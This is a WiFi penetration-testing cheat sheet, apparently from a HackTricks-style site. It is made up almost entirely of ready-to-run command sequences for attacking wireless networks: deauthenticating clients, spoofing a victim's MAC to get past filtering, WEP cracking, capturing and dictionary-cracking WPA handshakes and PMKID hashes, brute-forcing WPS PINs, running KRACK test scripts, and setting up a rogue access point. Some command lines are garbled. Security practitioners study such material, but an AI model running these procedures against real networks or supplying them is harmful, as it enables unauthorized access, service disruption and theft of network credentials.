Github Email LinkedIn

šŸŸØAttacks

LogoPentesting WifiHackTricks

Monitoring

Set a wireless network interface to the monitoring mode:

airmon-ng start wlan0

ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up

Set a wireless network interface to the monitoring mode on a specified channel:

airmon-ng start wlan0 8

iwconfig wlan0 channel 8

[Optional] Kill services that might interfere with wireless network interfaces in the monitoring mode:

airmon-ng check kill

Set a wireless network interface back to the managed mode:

airmon-ng stop wlan0mon

ifconfig wlan0 down && iwconfig wlan0 mode managed && ifconfig wlan0 up

Search for WiFi networks within your range:

airodump-ng --wps -w airodump_sweep_results wlan0mon

wash -a -i wlan0mon

[Optional] Install reaver/wash on WiFi Pineapple Mark VII:

opkg update && opkg install libpcap reaver

[Optional] Install reaver/wash on WiFi Pineapple Nano:

opkg update && opkg install libpcap && opkg -d sd install wash

Monitor a WiFi network to capture handshakes/requests:

airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF

If you specified the output file, don't forget to stop airodump-ng after you are done monitoring because it will fill up all your free storage space with a large PCAP file.

Use Kismet or WiFi Pineapple to find more information about wireless access points, e.g. their MAC address, vendor's name, etc.

Find Hidden SSIDs

airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> wlan0mon
aireplay-ng -0 20 -a <BSSID> -c <VictimMac> wlan0mon

Bypass MAC Filtering

airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 10 --a <BSSID> -c <VictimMac> wlan0mon
ifconfig wlan0mon down
macchanger --mac <VictimMac> wlan0mon
ifconfig wlan0mon up
aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon

Cracking

Check if a wireless interface supports packet injection:

aireplay-ng --test wlan1 -e essid -a FF:FF:FF:FF:FF:FF

WPA/WPA2 Handshake

Monitor a WiFi network to capture a WPA/WPA2 4-way handshake:

airodump-ng wlan0mon --channel 8 -w airodump_essid_results --essid essid --bssid FF:FF:FF:FF:FF:FF

[Optional] Deauthenticate clients from a WiFi network:

aireplay-ng --deauth 10 wlan1 -e essid -a FF:FF:FF:FF:FF:FF

Start the dictionary attack against a WPA/WPA2 handshake:

aircrack-ng -e essid -b FF:FF:FF:FF:FF:FF -w rockyou.txt airodump_essid_results*.cap

PMKID Attack

Crack the WPA/WPA2 authentication without deauthenticating clients.

Install the required set of tools on Kali Linux:

apt-get update && apt-get -y install hcxtools

[Optional] Install the required tool on WiFi Pineapple Mark VII:

opkg update && opkg install hcxdumptool

[Optional] Install the required tool on WiFi Pineapple Nano:

opkg update && opkg -d sd install hcxdumptool

Start capturing PMKID hashes for all nearby networks:

hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon

[Optional] Start capturing PMKID hashes for specified WiFi networks:

echo HH:HH:HH:HH:HH:HH | sed 's/\://g' >> filter.txt

hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0mon --filterlist_ap=filter.txt --filtermode=2

Sometimes it can take hours to capture a single PMKID hash.

Extract PMKID hashes from a PCAP file:

hcxpcaptool hcxdumptool_results.cap -k hashes.txt

Start the dictionary attack against PMKID hashes:

hashcat -m 16800 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt

Find out more about Hashcat from my other project.

WEP Attacks

Fake Authentication Attack

airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#Whatā€™s my mac?
macchanger --show wlan0mon
aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> wlan0mon
aircrack-ng -b <BSSID> <PCAP_of_FileName>

ARP Replay Attack

airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#Whatā€™s my mac?
macchanger --show wlan0mon
aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> wlan0mon
aircrack-ng -b <BSSID> <PCAP_of_FileName>

Chop Chop Attack

airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#Whatā€™s my mac?
macchanger --show wlan0mon
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
aireplay-ng -4 -b <BSSID> -h <OurMac> wlan0mon
 #Press ā€˜yā€™ ;
packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
aireplay-ng -2 -r <FileName2> wlan0mon
aircrack-ng <PCAP_of_FileName>

Fragmentation Attack

airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#Whatā€™s my mac?
macchanger --show wlan0mon
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
aireplay-ng -5 -b <BSSID> -h < OurMac > wlan0mon
#Press 'y' ;
packetforge-ng -0 -a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
aireplay-ng -2 -r <FileName2> wlan0mon
aircrack-ng <PCAP_of_FileName>

SKA (Shared Key Authentication) Type Cracking

airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon
ifconfig wlan0mon down
macchanger --mac <VictimMac> wlan0mon
ifconfig wlan0mon up
aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon
aireplay-ng --deauth 1 -a <BSSID> -h <FakedMac> wlan0mon
aircrack-ng <PCAP_of_FileName>

WPA / WPA2 Attacks

WPS Attack

airmon-ng start wlan0
apt-get install reaver
wash -i wlan0mon -C
reaver -i wlan0mon -b <BSSID> -vv -S
#or, Specific attack
reaver -i -c <Channel> -b <BSSID> -p <PinCode> -vv -S
# Crack a WPS PIN:
reaver -vv --pixie-dust -i wlan1 -c 8 -e essid -b FF:FF:FF:FF:FF:FF

# Crack a WPS PIN with some delay between attempts:
reaver -vv --pixie-dust -N -L -d 5 -r 3:15 -T 0.5 -i wlan1 -c 8 -e essid -b FF:FF:FF:FF:FF:FF

KRACK Attack

LogoGitHub - NoahhhRyan/krackattacks-testGitHub
LogoKRACK Kali Vulnerability Test - Test Your WiFi Router for KRACK (FT) - Arduino Projects and Robotics TutorialArduino Projects and Robotics Tutorial
apt-get update apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome
git clone https://github.com/NoahhhRyan/krackattacks-test.git
cd krackattacks-test-research cd krackattacks
chmod 777 krack-ft-test.py
chmod 777 disable-hwcrypto.sh
./disable-hwcrypto.sh
python krack-ft-test.py

# Set the network.conf file, in the directory, 
# you need to change the ā€œtestnetā€ in it to the wifi name you
#  want to attack, the password is arbitrary, and it is saved in
# the suite directory

sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf
LogoKRACK Attacks: Breaking WPA2
Logokrackattacks-scripts,Scr561GithubHelp krackattacks-scripts,Scr561

Enterprise Attacks

LogoHacking WPA Enterprise with Kali Linux | Offensive Securityoffsectraining
LogoAttacking and Defending WPA Enterprise Networks | Context Information Security USContext Information Security US
LogoAttacking WPA2 enterprise - Infosec ResourcesInfosec Resources
LogoAttacking WPA Enterprise Wireless NetworkPentest Blog

Dictionary Attack

airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP>

crack with Hashcat

airmon-ng
airmon-ng start wlx000f00313c95
airodump-ng wlan1mon -c 11
airodump-ng wlan1mon -c 11 --bssid 48:EE:0C:8E:D0:5C -w /root/hp/
aireplay-ng -0 0 -a 48:EE:0C:8E:D0:5C  wlan1mon

# convert pcap to  hccapx
https://hashcat.net/cap2hccapx/

apt install hashcat-utils
crunch 8 8 1234567890 | hashcat -m 22000  18081_1596091404.hccapx --status  -o cracked.txt

Crack with John The Ripper

airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
cd /pentest/passwords/john
john -wordlist=<Wordlist> --rules -stdout|aircrack-ng -0 -e <ESSID> -w - <PCAP_of_FileName>

Crack with coWPAtty

airmon-ng start wlan0
airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID>
genpmk -s <SSID> -f <Wordlist> -d <HashesFileName>
cowpatty -r <PCAP_of_FileName> -d <HashesFileName> -2 -s <SSID>

Crack with Pyrit

rootairmon-ng start wlan0
rooairodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
rootaireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
ropyrit -r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
ropyrit -i <Wordlist> import_passwords
ropyrit -e <ESSID> create_essid
rootpyrit batch
rootpyrit -r <PCAP_of_FileName> attack_db

Precomputed WPA Keys Database Attack

airmon-ng start wlan0
airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon
kwrite ESSID.txt
airolib-ng NEW_DB --import essid ESSID.txt
airolib-ng NEW_DB --import passwd <DictionaryFile>
airolib-ng NEW_DB --clean all
airolib-ng NEW_DB --stats
airolib-ng NEW_DB --batch
airolib-ng NEW_DB --verify all
aircrack-ng -r NEW_DB <Handshaked_PCAP>

WPA3 Attacks

DragonBlood Attack

LogoDragonblood: Analysing WPA3's Dragonfly Handshake
LogoGitHub - vanhoefm/dragonslayerGitHub
LogoGitHub - vanhoefm/dragondrain-and-timeGitHub
LogoGitHub - vanhoefm/dragondrain-and-timeGitHub

Rogue AP

airmon-ng start wlan0
airbase-ng -e ā€œ<FakeBSSID>ā€ wlan0mon
brctl addbr <VariableName>
brctl addif <VariableName> wlan0mon
brctl addif <VariableName> at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig <VariableName> up
aireplay-ng -deauth 0 -a <victimBSSID> wlan0mon
dhclient3 <VariableName> &
wireshark &
;select <VariableName> interface
LogoGitHub - wifiphisher/wifiphisher: The Rogue Access Point FrameworkGitHub

Evil Twin

PreviousBasicsNextSniffing

Last updated